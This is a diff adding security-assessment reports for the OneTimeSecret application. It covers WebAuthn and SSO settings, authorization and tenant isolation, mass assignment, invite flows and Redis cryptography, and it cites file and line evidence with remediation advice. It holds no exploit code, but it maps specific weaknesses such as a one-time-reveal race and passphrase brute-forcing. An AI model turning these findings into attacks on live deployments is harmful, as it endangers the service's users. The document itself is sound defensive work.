+**Evidence:** `apps/web/auth/config/features/webauthn.rb:32` — `webauthn_user_verification 'preferred'`; `:9,44` enables `webauthn_login` (passwordless). With `preferred`, the UV flag is not required.
+
+**Impact:** Passwordless WebAuthn can succeed with user-presence only (no biometric/PIN) — single-factor possession login without guaranteed user verification.
+
+**Remediation:** For passwordless/primary WebAuthn, set `webauthn_user_verification 'required'`.
+
+---
+
+## 17. LOW — Stateless WebAuthn challenge, no single-use ledger
+
+**Status:** CONFIRMED (Rodauth design).
+
+**Evidence:** Challenge + `compute_hmac(challenge)` sent to the client; verification recomputes the HMAC (`timing_safe_eql?`) and the gem verifies the assertion. The challenge is never persisted server-side and carries no nonce/expiry.
+
+**Impact:** Challenge is random and unforgeable, but a captured valid `{challenge, hmac, assertion}` stays structurally acceptable until `AUTH_SECRET` rotates. Practical replay is blocked by `sign_count`; the gap is the absence of an independent freshness control. `webauthn_*_timeout` values are client-side hints only.
+
+**Remediation:** Accept as a known tradeoff, or add a short-TTL stateful challenge ledger; ensure `AUTH_SECRET` rotation procedures exist.
+
+---
+
+## 18. LOW/MEDIUM (NEEDS-VALIDATION) — Tenant-controlled OIDC issuer/discovery (per-domain SSO)
+
+**Status:** Cross-tenant credential reuse = CONFIRMED MITIGATED; tenant-issuer trust = NEEDS-VALIDATION.
+
+**Evidence (mitigations are strong):**
+- `apps/web/auth/config/hooks/omniauth_tenant.rb:64-78,145-151` — tenant context stored only in request phase, not overwritten on callback.
+- `omniauth_tenant.rb:177-214` — callback re-resolves host, 403 on `domain_id` mismatch.
+- `omniauth_tenant.rb:312-340` — strategy-class validation before credential injection (`STRATEGY_CLASS_MAP`), 400 on mismatch.
+- `lib/onetime/models/custom_domain/sso_config.rb` — credentials encrypted with AAD bound to `domain_id`; host lookup is exact downcased index membership.
+- `lib/onetime/auth_config.rb:244-246` — `allow_platform_fallback_for_tenants?` defaults `false`.
+
+**Residual risk:** A tenant's OIDC `issuer` is tenant-controlled and (with `discovery: true`) dictates the trust target. Crossed with Findings 1/2/4, a malicious tenant admin could configure an issuer asserting arbitrary verified-looking emails and link into accounts whose email matches another user (especially canonical-domain accounts). Identity links and login are global per the `accounts` table even though org-join is tenant-scoped.
+
+**Remediation:** Enforce `email_verified` + explicit linking (Findings 1/4); constrain tenant-IdP-authenticated identities to the tenant org boundary at the session/authorization layer; optionally allowlist tenant `issuer` hosts.
+
+---
+
+## 19. INFO — `IdentityResolution.full_authenticated?` omits the `authenticated == true` check (dead path)
+
+**Status:** CONFIRMED (latent; no current impact).
+
+**Evidence:**
+- `lib/onetime/middleware/identity_resolution.rb:259-267` — `full_authenticated?` checks `authenticated_at` and (`external_id` OR `account_id`) but **not** `authenticated == true`.
+- `:104` then looks up the customer by `session['account_external_id']` — a key **never set** by the auth flow (only `external_id` is set). So `find_by_extid(nil)` returns nil → `no_identity`. The path is effectively dead.
+- `env['identity.authenticated']` has **no consumers** in `lib/` or `apps/` (grep). The real gate is `BaseSessionAuthStrategy` (`lib/onetime/application/auth_strategies/base_session_auth_strategy.rb:33-39`), which correctly requires `authenticated == true` + `external_id`.
+
+**Impact:** None today. If a future change ever wires this middleware's result into authorization, or sets `account_external_id`, the weak `full_authenticated?` predicate would grant access to `awaiting_mfa`/partial sessions.
+
+**Remediation:** Fix `full_authenticated?` to require `session['authenticated'] == true`; correct or remove the `account_external_id` lookup. Defense-in-depth: have the session strategy also treat `awaiting_mfa == true` as not-authenticated regardless of the `authenticated` flag.
+
+---
+
+## Session lifecycle notes (mostly positive)
+
+- **Fixation:** Mitigated. On login, Rodauth `update_session` calls `clear_session` (overridden to `session.destroy`, `apps/web/auth/config/base.rb:74-76`), and OTS's `delete_session` generates a new sid (`lib/onetime/session.rb:131-168`), so the cookie sid rotates before `account_id` is written.
+- **Confidentiality/integrity:** Session data is AES-256-GCM + HMAC-SHA256 over Redis `StringKey`, HKDF-derived keys (`session.rb`, `key_derivation.rb`). Constant-time HMAC compare (`session.rb:213`). Sound.
+- **Privilege change on MFA:** `PrepareMfaSession` sets only `account_id`/`email` (not `authenticated`/`external_id`); `SyncSession` sets the full authenticated session and clears `awaiting_mfa` post-MFA. Correct.
+- **Logout:** `clear_session` → `session.destroy` deletes the Redis key and rotates the cookie. Logout invalidates the current session only (standard). Note two parallel session ledgers exist: the Rack/Redis session and Rodauth's `account_active_session_keys` (HMAC'd) for the active-sessions feature.
+- **Remember-me:** Defaults inherited (14-day cookie, `extend_remember_deadline? false`) — `apps/web/auth/config/features/remember_me.rb`. Validate remember tokens are invalidated on password change/close-account.
+
+---
+
+## Suggested remediation priority
+
+1. **SSO core (Findings 1, 2, 4, 10):** Enforce `email_verified`; require explicit account-linking confirmation; apply domain policy on the link path; safer default allowlist; honor `mfa_policy == :required` for SSO. This single workstream addresses the most serious, chained risk.
+2. **Email-link host pinning (Finding 3):** Override `domain`/`base_url`/`baseuri` to canonical host; halt invalid hosts at the edge/DomainStrategy. Also fixes Finding 6 (WebAuthn RP-ID/origin) if the canonical host is reused there.
+3. **Recovery codes (Findings 5, 13):** HMAC at rest, raise to 128-bit, confirm recovery-auth lockout.
+4. **DoS/enumeration hardening (Findings 7, 8, 9, 15):** Uniform reset response, `password_maximum_bytes`, shorter lockout + IP throttle, dummy argon2 on no-match.
+5. **Config assertions (Finding 12):** Hard-fail boot without a strong `AUTH_SECRET`.
+
+---
+
+*Files of interest (absolute):*
+`/home/user/onetimesecret/apps/web/auth/config/hooks/omniauth.rb`,
+`/home/user/onetimesecret/apps/web/auth/config/hooks/omniauth_tenant.rb`,
+`/home/user/onetimesecret/apps/web/auth/config/hooks/login.rb`,
+`/home/user/onetimesecret/apps/web/auth/operations/detect_mfa_requirement.rb`,
+`/home/user/onetimesecret/apps/web/auth/operations/{prepare_mfa_session,sync_session,mfa_state_checker}.rb`,
+`/home/user/onetimesecret/apps/web/auth/config/features/{omniauth,webauthn,mfa,lockout,password_requirements,account_management}.rb`,
+`/home/user/onetimesecret/apps/web/auth/config/email/{reset_password,email_auth,verify_account,delivery}.rb`,
+`/home/user/onetimesecret/apps/web/auth/config/base.rb`,
+`/home/user/onetimesecret/apps/web/auth/config/rodauth_overrides.rb`,
+`/home/user/onetimesecret/lib/onetime/session.rb`,
+`/home/user/onetimesecret/lib/onetime/key_derivation.rb`,
+`/home/user/onetimesecret/lib/onetime/middleware/identity_resolution.rb`,
+`/home/user/onetimesecret/lib/onetime/middleware/domain_strategy.rb`,
+`/home/user/onetimesecret/lib/onetime/application/auth_strategies/base_session_auth_strategy.rb`,
+`/home/user/rodauth-omniauth/lib/rodauth/features/omniauth.rb` (clean upstream v0.6.2),
+`/home/user/rodauth/lib/rodauth/features/{base,email_base,email_auth,reset_password,otp,recovery_codes,webauthn}.rb`.

--- a/docs/security/assessment-2026-06-22/findings/02-authz-idor.md
+++ b/docs/security/assessment-2026-06-22/findings/02-authz-idor.md
@@ -1,0 +1,335 @@
+# Security Assessment 02 — Authorization, Multi-Tenant Isolation, IDOR, Privilege Escalation, Mass Assignment
+
+**Target:** OneTimeSecret (`/home/user/onetimesecret`), deps `familia` (Redis ORM), `otto` (web framework)
+**Branch:** `claude/vigilant-goldberg-97ijfl`
+**Scope:** API authorization enforcement, tenant/org isolation, IDOR, privilege escalation (colonel), mass assignment, invite flow, incoming feature.
+**Method:** Read-only source review. Evidence cited as `file:line`. Findings tagged CONFIRMED / NEEDS-VALIDATION.
+**Date:** 2026-06-22
+
+---
+
+## Executive Summary
+
+The authorization architecture is **mature and largely sound**. It centers on an entitlement-based model
+(`require_entitlement!` / `require_entitlement_in!`) layered over org membership, with a system-level
+"colonel" superuser role gated by a verified-email requirement. Secrets/receipts use a possession-based
+access model backed by HMAC-signed, 256-bit unguessable identifiers, which neutralizes the obvious IDOR
+class for that data.
+
+**No Critical or High severity exploitable issues were confirmed.** The most valuable hardening items are
+Medium-severity defense-in-depth gaps: an inconsistent authorization path on member removal, sensitive
+internal identifiers exposed in organization `safe_dump`, an organization `create!` mass-assignment splat,
+and a model-layer `change_role!` that accepts `'owner'` without a guard. Several NEEDS-VALIDATION items
+depend on deployment configuration (extid HMAC secret, proxy IP resolution, presence of an upstream rate
+limiter).
+
+### Top Findings
+
+| # | Severity | Status | Finding | Evidence |
+|---|----------|--------|---------|----------|
+| F1 | Medium | CONFIRMED | `RemoveMember` is the only member-mgmt endpoint NOT using `require_entitlement_in!`; relies on raw role-string checks (inconsistent, not fail-closed-by-entitlement) | `apps/api/organizations/logic/members/remove_member.rb:39-58,135-181` |
+| F2 | Medium | CONFIRMED | Organization `safe_dump` leaks internal `objid`/`identifier`, owner's `owner_id`/`created_by` custid, and billing/contact emails to any active member | `lib/onetime/models/organization/features/safe_dump_fields.rb:17-29` |
+| F3 | Medium | NEEDS-VALIDATION | `Organization.create!` forwards an open `**` splat into `new` — `planid`/`is_default`/Stripe/`complimentary` mass-assignable IF any caller forwards user params | `lib/onetime/models/organization.rb:431-437`; `with_organization_billing.rb:32-61` |
+| F4 | Medium | NEEDS-VALIDATION | `OrganizationMembership#change_role!` rejects `colonel` but ACCEPTS `owner` with no caller/last-owner guard at the model layer | `lib/onetime/models/organization_membership.rb:258-274` |
+| F5 | Medium | NEEDS-VALIDATION | Organization `extid` derived with plain SHA-256, no keyed HMAC `secret:` — defense-in-depth gap if an `objid` ever leaks (and objid IS leaked by F2) | `lib/onetime/models/organization.rb:46`; `familia/lib/familia/features/external_identifier.rb:323-336` |
+| F6 | Low | CONFIRMED | Receipt `safe_dump` exposes creator's `owner_id` via possession-based (unauthenticated) receipt/burn/batch endpoints | `lib/onetime/models/receipt/features/safe_dump_fields.rb:56-57`; `apps/api/v3/logic/secrets.rb:216-255` |
+| F7 | Low | CONFIRMED | `show_invite` (noauth) discloses inviter email + `account_exists` boolean to any token holder | `apps/api/invite/logic/base.rb:51-64`; `apps/api/invite/logic/invites/show_invite.rb:97-99` |
+| F8 | Low | CONFIRMED | `Customer.create!` has no allowlist guard — `role`/`verified` mass-assignable at model layer; safe only by caller discipline (all hardcode `'customer'`) | `lib/onetime/models/customer.rb:271-313`; `status.rb:23` |
+| F9 | Low–Medium | NEEDS-VALIDATION | Incoming `/secret` and `/validate` (anonymous) have no in-logic rate limiter; each `/secret` enqueues an email to a configured recipient | `apps/api/incoming/logic/create_incoming_secret.rb:216-235` |
+| F10 | Low | NEEDS-VALIDATION | Invite noauth rate limiter is high (100/10min) and falls back to a shared `0.0.0.0` IP bucket if proxy IP not resolved | `lib/onetime/security/invite_token_rate_limiter.rb:31-38` |
+| F11 | Info/Positive | CONFIRMED | Colonel role: granted only via Redis `role` field (CLI), checked at edge (`role=colonel`) + every one of 22 logic actions; verified-email gate | see Section 4 |
+| F12 | Info/Positive | CONFIRMED | Secrets/receipts use HMAC-signed 256-bit identifiers (no committed default secret) — possession model is sound | `familia/lib/familia/verifiable_identifier.rb:45-71` |
+
+---
+
+## 1. API Authorization Enforcement
+
+### How the current principal is resolved
+- Authentication is post-routing (Otto `RouteAuthWrapper`), not middleware. Strategies live in
+  `lib/onetime/application/auth_strategies/*`. The authenticated `Customer` is exposed to logic as `cust`.
+- **Organization context** (`auth_org` / `auth_membership`) is resolved by
+  `lib/onetime/application/organization_loader.rb`. Selection priority: `O-Organization-ID` header →
+  session `organization_id` → custom-domain host → customer `default_org_id` → `is_default` org → first org → nil.
+- The client-controllable `O-Organization-ID` header is **validated** with `org.member?(customer)` AND
+  domain-scope (`can_access_domain?`) before use — `organization_loader.rb:242-267`. A user cannot select
+  an org they are not a member of. **CONFIRMED safe.**
+
+### How ownership/entitlement is enforced
+- The canonical gate is `require_entitlement!(entitlement)` (`lib/onetime/logic/base.rb:183-256`) and
+  `require_entitlement_in!(org, entitlement)` (`:271-318`). Both are **fail-closed**: missing
+  org/membership/inactive-membership raise; anonymous users in `require_entitlement_in!` are rejected.
+  Colonels bypass via `has_system_role?('colonel')`.
+- `require_entitlement_in!` always resolves the target org from the URL `extid` (`load_organization`) and
+  then checks the *caller's* membership in that specific org — so changing the `extid` param to another
+  org fails the membership/entitlement check. **CONFIRMED safe** across organizations, domains, invitations.
+
+### GetAccount and self-scoped reads
+- `apps/api/account/logic/account/get_account.rb:32-41` returns the session `cust` only (no param-based
+  customer lookup). No account IDOR. The full account API operates on `cust`, not on client-supplied IDs.
+
+---
+
+## 2. Tenant / Organization Isolation
+
+### Identity model (CONFIRMED, Info)
+- `objid` = internal UUIDv7 primary key; `extid` (format `on<id>s`) = public ID derived from objid.
+  `find_by_extid` does an explicit `extid_lookup` and returns nil on miss (no scan/enumeration).
+- `find_by_org_customer(org.objid, cust.objid)` (`organization_membership.rb:635-640`) uses a deterministic
+  composite key — scoped to both org and customer objids, so no cross-org membership confusion.
+- `Organization#owner?` (`organization.rb:101-106`) and `#member?` (`:112-123`) check the membership record
+  scoped to this org. `owner?` requires an active membership with `role == 'owner'`. No cross-org collision.
+
+### Effective entitlements (CONFIRMED, Info, with notes)
+- `ROLE_ENTITLEMENTS` (owner ⊇ admin ⊇ member) at `organization_membership.rb:102-106`.
+- Membership `can?` → materialized set or `compute_entitlements_from_role`. Effective =
+  `(org.entitlements ∩ ROLE_ENTITLEMENTS[role]) + membership_grants − membership_revokes`
+  (`organization_membership/features/with_materialized_entitlements.rb:100-140`).
+- **Note (Low, NEEDS-VALIDATION):** membership-level grants are unioned *after* the org∩role intersection,
+  so an operator grant can exceed the role/plan ceiling. Intentional override design; grants are
+  operator-only today (no production endpoint writes membership grants), so not currently reachable.
+- **Note (Low, NEEDS-VALIDATION):** a nil role defaults to `member` (`:92,:231`) — fail-open-to-member
+  rather than fully fail-closed. Defensible but worth tightening.
+
+### F1 — RemoveMember authorization inconsistency (Medium, CONFIRMED)
+`apps/api/organizations/logic/members/remove_member.rb` is the **only** member-management endpoint that
+does NOT call `require_entitlement_in!(org, 'manage_members')`. Every sibling does
+(`create_invitation.rb:42`, `revoke_invitation.rb:25`, `resend_invitation.rb:28`, `list_invitations.rb:24`,
+`update_member_role.rb:45`, `delete_organization.rb:38`). Instead it relies on raw **role-string** checks
+in `validate_removal!` (`remove_member.rb:135-181`).
+- **Not directly exploitable today:** a plain `member` falls to the `else` branch and is denied (`:174-179`).
+- **Risk:** it diverges from the entitlement model the rest of the app uses; a stale/elevated role string,
+  or an operator membership-level revoke of `manage_members`, would not be honored. The code comments
+  (`organization_membership.rb:62-65`) explicitly state authority should live in entitlements, not role
+  strings.
+- **Remediation:** adopt `require_entitlement_in!(@organization, 'manage_members')` for consistency and
+  fail-closed alignment.
+
+### F2 — Organization safe_dump leaks internal/cross-tenant data (Medium, CONFIRMED)
+`lib/onetime/models/organization/features/safe_dump_fields.rb`:
+- `:objid` (`:18`) and `:identifier` (`:17`, == objid) — internal UUID the opaque-ID design is meant to hide
+  (`organization.rb:10-30`). Exposing it defeats the opaque-ID pattern and, combined with F5, lets a holder
+  derive the extid.
+- `:owner_id` (`:22`) and `:created_by` (`:27`) — the owner's Customer custid. `get_organization.rb:38`
+  requires only `api_access`, so **any active member** (including a plain member) sees the owner's custid.
+- `:contact_email` / `:billing_email` (`:29`) — tenant-internal PII visible to every member.
+- `:entitlements` / `:limits` (`:41-51`) — org-level capability set, broader than the caller's own `can?` set
+  (capability disclosure; confirm the frontend gates on membership entitlements, not org entitlements).
+- **Good news (CONFIRMED):** `stripe_customer_id`, `stripe_subscription_id`, `email_hash`,
+  `subscription_status` are **NOT** in safe_dump (`with_organization_billing.rb:31-76` vs the dump list).
+- **Remediation:** remove `objid`/`identifier`/`owner_id`/`created_by` from org safe_dump; gate billing
+  emails to `manage_billing`/`manage_org` holders.
+
+### Domain config / cross-domain (CONFIRMED, mostly safe)
+- Domain config endpoints (`apps/api/domains/policies/domain_config_authorization.rb:152-168`) load domain by
+  extid, resolve owning org, require `manage_org`, check the org plan entitlement, AND enforce per-membership
+  domain scope (`can_access_domain?`, `organization_membership.rb:286-290`). Strong, layered.
+- `GetDomain` / `RemoveDomain` (`apps/api/domains/logic/domains/get_domain.rb`, `remove_domain.rb`) load by
+  extid, check `accessible_by?` (org owner/member), require `custom_domains` entitlement, and enforce domain
+  scope. Consistent and fail-closed.
+- `AddDomain` (`add_domain.rb`) resolves an explicit `org_id` param via `resolve_target_organization`
+  (returns only orgs where `org.member?(@cust)`) and then re-checks `require_entitlement_in!(org,
+  'custom_domains')` — the entitlement check is the real authority, so the looser `member?` gate on
+  resolution does not weaken it. CONFIRMED safe. It also rejects domains already owned by another org
+  (`:80-89`), preventing cross-tenant domain takeover.
+
+---
+
+## 3. IDOR — Secrets, Receipts, Domains, Orgs, Memberships
+
+### Possession-based model (CONFIRMED, Info — F12)
+Secrets and Receipts are accessed by identifier alone, intentionally:
+`apps/api/v2/logic/secrets/burn_secret.rb:15-27` documents that the receipt URL is the credential. This is
+safe **because** identifiers are HMAC-signed 256-bit random values minted by
+`Familia::VerifiableIdentifier` (`familia/lib/familia/verifiable_identifier.rb:45-88`), which refuses a
+committed default secret (`KeyError` if `VERIFIABLE_ID_HMAC_SECRET` unset) — fail-closed. The `Secret#owner?`
+(`secret.rb:78-80`) and `Receipt#owner?` (`receipt.rb:148-150`) predicates are used only for display flags
+(e.g. `is_owner`), not for access control on show/burn — by design.
+
+- `update_receipt` (mutation) correctly DOES check ownership: `raise OT::Unauthorized ... unless
+  receipt.owner?(cust)` (`apps/api/v2/logic/secrets/update_receipt.rb:30`). Good contrast — writes are
+  owner-gated, reads are possession-gated.
+- `list_receipts` correctly scopes by the authenticated customer / org (`auth_org.receipts`) / domain
+  (`domain.accessible_by?(cust)`) — `apps/api/v2/logic/secrets/list_receipts.rb:121-169`. No IDOR.
+
+### F6 — Receipt safe_dump owner_id disclosure (Low, CONFIRMED)
+Receipt `safe_dump` emits `owner_id` (`lib/onetime/models/receipt/features/safe_dump_fields.rb:56-57`).
+Because receipt show/burn/`ShowMultipleReceipts` are possession-based and reachable anonymously
+(`apps/api/v3/logic/secrets.rb:216-255` returns `safe_dump` for up to 25 receipts by id), anyone holding a
+receipt identifier learns the creator's internal customer objid. Low severity (identifier is unguessable and
+typically only the creator holds it), but the internal ID need not be in the dump.
+- **Remediation:** remove `owner_id`/`custid` from receipt safe_dump, or strip them in the
+  possession-based serialization path.
+
+---
+
+## 4. Privilege Escalation — Colonel (Admin) Role
+
+**No exploitable escalation path found.** (CONFIRMED — F11, positive.)
+
+- **Grant mechanism:** colonel = the Customer Redis `role` field set to `'colonel'`
+  (`lib/onetime/models/customer/features/status.rb:23`). The only production writer is the CLI
+  (`lib/onetime/cli/customers/role_command.rb:85`). The config-based `ColonelAssignment.colonel?(email)`
+  (`colonel_assignment.rb:43-51`) has **no production callers** — dead code; there is no email→colonel
+  auto-promotion.
+- **Edge check:** every colonel route declares `auth=sessionauth role=colonel`
+  (`apps/api/colonel/routes.txt:10-50`). `role=colonel` is matched against `metadata[:user_roles]`, which
+  `SessionAuthStrategy` populates from the freshly-loaded Customer record
+  (`session_auth_strategy.rb:25-29`) — server-side, not client-supplied.
+- **Logic check:** all **22** colonel logic actions independently call `verify_one_of_roles!(colonel: true)`
+  in `raise_concerns` (e.g. `update_user_plan.rb:28`, `delete_secret.rb:19`,
+  `manage_entitlement_override.rb:74`, `get_user_details.rb:19`). No action relies solely on routes.txt.
+- **Verified-email gate:** `has_system_role?('colonel')` returns false unless `cust.verified?`
+  (`lib/onetime/application/authorization_policies.rb:52-68`) — defense against registering an admin email
+  before the legitimate owner verifies.
+- **role_index** (`customer/features/role_index.rb`) is a derived read-side projection; authorization never
+  reads it, so poisoning it (which requires Redis write access) cannot grant runtime colonel. Low.
+
+### F8 — `role`/`verified` mass-assignable at Customer model layer (Low, CONFIRMED)
+`Customer.create!` forwards `**kwargs` to `super` with no allowlist (`customer.rb:271-313`), and `role`,
+`verified`, `verified_by` are plain writable fields (`status.rb:23-26`). `Customer.create!(role: 'colonel')`
+works at the Ruby level. **Safe today only because every signup path hardcodes** `role = 'customer'`
+(`create_account.rb:100,104`; `apps/web/auth/operations/create_customer.rb:62-64`;
+`sync_session.rb:175-178`). Any future endpoint that forwards request params as `**kwargs` would become a
+privilege-escalation vector.
+- **Remediation:** strip/reject `role`, `verified`, `verified_by` from externally-sourced kwargs in
+  `Customer.create!` rather than relying on caller discipline.
+
+---
+
+## 5. Mass Assignment / Over-Posting
+
+**No exploitable over-posting vulnerability found.** (CONFIRMED.) Every create/update endpoint reads named
+params individually and assigns to specific, validated fields. No production code passes a raw params hash
+into a model constructor or bulk setter. Grep across `apps/**` + `lib/**` (excluding specs) for
+`.new(params)`, `.new(**params)`, `.create!(**params)`, `from_hash(params)`, `.merge(params`, `params.each`
+→ zero production hits.
+
+### ORM capability (the latent risk surface)
+- `familia/lib/familia/horreum.rb:446` `initialize_with_keyword_args` sets any declared field from kwargs
+  (no field-level allowlist).
+- `apply_fields` / `multi_field_update` (`familia/lib/familia/horreum/persistence.rb:371,427,522`) call
+  `guard_allowed_fields!` (`:761`) which only blocks *undeclared* fields — it does NOT protect declared
+  sensitive fields. The protection lives entirely in the application layer.
+
+### Endpoint review (all CONFIRMED safe)
+- `create_account.rb` — reads login/password/skill; hardcodes role/verified.
+- `update_account_field.rb` — abstract base; each subclass hardcodes a single field. `UpdateLocale`,
+  `UpdateDomainContext`, `UpdatePassword`, `UpdateNotificationPreference`. None allow role/verified/planid.
+- `update_notification_preference.rb:50-61` — the only dynamic `send("#{field}=")`, constrained by
+  `VALID_FIELDS = %w[notify_on_reveal]` allowlist (re-checked in `perform_update`), value coerced to bool.
+- `create_organization.rb` / `update_organization.rb` — positional/named args only; update writes only
+  display_name/description/billing_email/contact_email behind `manage_org`.
+- `update_member_role.rb` — `VALID_ROLES = %w[member admin]`, rejects `owner`.
+- `welcome.rb` (billing) — only Stripe-derived keys; never request params.
+
+### F3 — Organization.create! open splat (Medium, NEEDS-VALIDATION)
+`lib/onetime/models/organization.rb:431-437`:
+```ruby
+org = new(display_name:, owner_id: owner_customer.custid, created_by: owner_customer.custid,
+          contact_email:, **)
+```
+`owner_id`/`created_by` are fixed from the trusted positional `owner_customer` arg (safe). But the open `**`
+splat means sensitive fields (`planid`, `is_default`, `stripe_customer_id`, `stripe_subscription_id`,
+`complimentary`, `subscription_status` — all plain fields per `organization.rb:70`,
+`with_organization_billing.rb:32-61`) become mass-assignable IF any caller forwards user params. Today the
+only caller (`create_organization.rb:99`) passes a fixed positional set — safe. Recommend an explicit
+allowlist instead of the open splat.
+
+---
+
+## 6. Invite Flow
+
+**Well-designed; most attacker hypotheses are mitigated.** (CONFIRMED.)
+
+- **Token (A1):** `SecureRandom.urlsafe_base64(32)` (256-bit), indexed via `token_lookup`
+  (`organization_membership.rb:552,576,599-606`). Not derived/sequential.
+- **Email binding (A2):** accept enforces normalized `invitation.invited_email == cust.email` at logic
+  (`apps/api/invite/logic/invites/accept_invite.rb:72-84`) AND model (`organization_membership.rb:331-334`)
+  AND Rodauth signup (`apps/web/auth/operations/accept_invitation.rb:56-58`). A different-email attacker
+  cannot accept someone else's invite.
+- **Role escalation (A3):** role comes only from the server-stored invitation
+  (`accept_invite.rb:105,113,125`; `activate!` `organization_membership.rb:394,407`); `process_params` parses
+  only `token`. Owner invites blocked at creation (`create_invitation.rb:59-66`). Not possible.
+- **Replay / revoke / expiry (A4):** single-use (token removed from lookup on accept,
+  `organization_membership.rb:339-341,417`), double-accept guard (`:319-322`,
+  `accept_invite.rb:51-59`), 7-day TTL + `expired?` checks (`:196-201`, `accept_invite.rb:62-69`), revoke
+  destroys the model (`:477-493`). Tokens cannot be replayed or accepted after revoke/expiry.
+- **signup_and_accept (A5):** email derived from the invite token, not user input
+  (`signup_and_accept.rb:62-65`); org/role server-controlled. Cannot forge arbitrary org membership.
+- **Authorization/scoping (A6):** create/resend/revoke require `manage_members` in the extid-named org;
+  resend/revoke additionally verify the invitation belongs to that org (`resend_invitation.rb:43-44`,
+  `revoke_invitation.rb:40-41`). Domain-scoped members are forbidden from member ops. Changing `extid` to an
+  unmanaged org fails the entitlement check.
+
+### F7 — show_invite information disclosure (Low, CONFIRMED)
+`GET /api/invite/:token` (noauth) returns org name+extid, invited email, role, **inviter's email**, expiry,
+and an **`account_exists` boolean** to any token holder (`apps/api/invite/logic/base.rb:51-64`;
+`show_invite.rb:97-99`). The token holder is the intended recipient, so most of this is acceptable; the
+marginal leak is the inviter's email and the account-existence oracle. Low (token is 256-bit, rate-limited).
+Product decision recommended on exposing inviter email pre-accept.
+
+### F10 — Invite rate limiter (Low, NEEDS-VALIDATION)
+`lib/onetime/security/invite_token_rate_limiter.rb:31-38`: 100 attempts / 600s per IP. Against a 256-bit
+token, brute force is infeasible regardless, so this is an abuse/DoS control more than an anti-enumeration
+one. IP falls back to `'0.0.0.0'` when `metadata[:ip]` is absent — verify the production proxy populates the
+real client IP (`lib/onetime/application/auth_strategies/helpers.rb`) so the limiter buckets correctly.
+
+---
+
+## 7. Incoming Feature
+
+**Anonymous by design; abuse constrained by recipient-hash indirection and per-domain entitlement gating.**
+
+- **Anonymous endpoints (B1):** all three routes are `noauth` (`apps/api/incoming/routes.txt:22-24`;
+  `auth_strategies.rb:24-27`). Intentional (anonymous tip submission). Senders supply an opaque SHA256 hash
+  of the recipient, never a raw email; the backend resolves hash→email server-side
+  (`create_incoming_secret.rb:57,168`).
+- **Domain context (B4):** derived from the validated `Host` header by middleware
+  (`lib/onetime/middleware/domain_strategy.rb:104-138`), not a client body param. The resolver enforces
+  strict per-domain separation (canonical YAML recipients vs per-domain Redis config, no cross-fallback,
+  `recipient_resolver.rb:39-100`). A hash valid on domain A will not resolve via domain B's config. No
+  cross-tenant injection.
+- **Ownership/entitlement (B3):** per-domain config is 1:1 with a CustomDomain
+  (`custom_domain/incoming_config.rb:46-49`); on custom domains all three endpoints require the domain-owning
+  org to hold `incoming_secrets` (`create_incoming_secret.rb:71`, `get_config.rb:43`,
+  `validate_recipient.rb:38`), failing closed for orphaned domains
+  (`lib/onetime/incoming/recipient_resolver.rb:117-146`).
+- **Recipient resolution (B5):** resolved email re-validated via Truemail before notification
+  (`create_incoming_secret.rb:86-98`); entitlement checked before Redis I/O to avoid existence/timing leaks.
+
+### F9 — No in-logic rate limit on anonymous incoming submit (Low–Medium, NEEDS-VALIDATION)
+`GET /api/incoming/config` publishes the recipient list (hash + display_name)
+(`apps/api/incoming/logic/get_config.rb:56-60`), so valid hashes are not secret (recipient *emails* are still
+not recoverable). Neither `/secret` nor `/validate` applies a rate limiter in its logic class, and each
+`/secret` enqueues an email to a configured recipient (`create_incoming_secret.rb:216-235`). If no upstream
+middleware limiter exists, an attacker can spam configured recipients or flood Redis with anonymous secrets.
+**Validate** whether an upstream per-IP limiter is applied; if not, add one. Medium absent any limiter,
+otherwise Low.
+
+---
+
+## Consolidated Remediation Priorities
+
+1. **F1** — Add `require_entitlement_in!(@organization, 'manage_members')` to `RemoveMember`.
+2. **F2 / F6** — Remove internal IDs (`objid`/`identifier`/`owner_id`/`created_by`) and gate billing emails
+   in Organization safe_dump; remove `owner_id`/`custid` from Receipt safe_dump.
+3. **F3 / F8** — Replace open `**` splats in `Organization.create!` / `Customer.create!` with explicit
+   allowlists (reject `role`, `verified`, `planid`, `is_default`, Stripe/billing fields from external input).
+4. **F4** — Make `OrganizationMembership#change_role!` reject `'owner'` (force a dedicated
+   `transfer_ownership!` with a last-owner check) so the only protection isn't one endpoint's validator.
+5. **F5** — Configure a keyed `secret:` for the Organization `external_identifier` so extids are not
+   forgeable/derivable from a leaked objid.
+6. **F9 / F10** — Verify/add anonymous rate limiting on incoming submit; verify production proxy IP
+   resolution for the invite limiter.
+7. **F7** — Product decision on exposing inviter email + account-existence in `show_invite`.
+
+## Verified-Safe Areas (no action needed)
+- Entitlement gating across v1/v2/v3 secrets, account, domains, organizations, invitations (fail-closed).
+- `O-Organization-ID` header is membership- and domain-scope-validated (no org spoofing).
+- Colonel role: server-side `role` field, edge + 22/22 logic checks, verified-email gate, no config
+  auto-promotion, role_index is non-authoritative.
+- Possession-based secret/receipt model backed by HMAC-signed 256-bit identifiers (no committed default).
+- Mass assignment: no production raw-params sink; dynamic setters are allowlisted.
+- Invite flow: unguessable single-use tokens, strict email binding, server-controlled role, expiry +
+  revocation enforced, org-scoped management.
+- Incoming: per-domain entitlement gating, server-derived host, strict per-tenant recipient separation.

--- a/docs/security/assessment-2026-06-22/findings/03-redis-familia-crypto.md
+++ b/docs/security/assessment-2026-06-22/findings/03-redis-familia-crypto.md
@@ -1,0 +1,333 @@
+# Security Assessment — Redis / Familia / Cryptography
+
+**Scope:** Secret/token generation & predictability, secret encryption at rest, passphrase
+hashing, the one-time (reveal/burn) guarantee & TOCTOU, Redis key naming, randomness audit,
+Lua/command injection, and DoS.
+
+**Repos:** `/home/user/onetimesecret` (app), `/home/user/familia` (Redis ORM).
+**Method:** Read-only source review. No runtime exploitation performed; race conditions are
+reasoned from code paths and labeled NEEDS-VALIDATION where a live PoC would be required to
+demonstrate the window.
+
+**Status legend:** CONFIRMED = verified directly in source. NEEDS-VALIDATION = strongly
+indicated by source but requires runtime confirmation of timing/config.
+
+---
+
+## Summary of findings (by severity)
+
+| # | Title | Severity | Status |
+|---|-------|----------|--------|
+| F1 | TOCTOU race in reveal/burn defeats the one-time guarantee (no atomic state-check-and-destroy) | HIGH | CONFIRMED (race window); NEEDS-VALIDATION (live double-reveal PoC) |
+| F2 | Encryption HKDF salt & BLAKE2b personalization left at shared library default (`'FamilialMatters'`) — no per-deployment domain separation | MEDIUM | CONFIRMED |
+| F3 | V1 reveal path has no passphrase rate limiting (brute-force on passphrase-protected secrets) | MEDIUM | CONFIRMED |
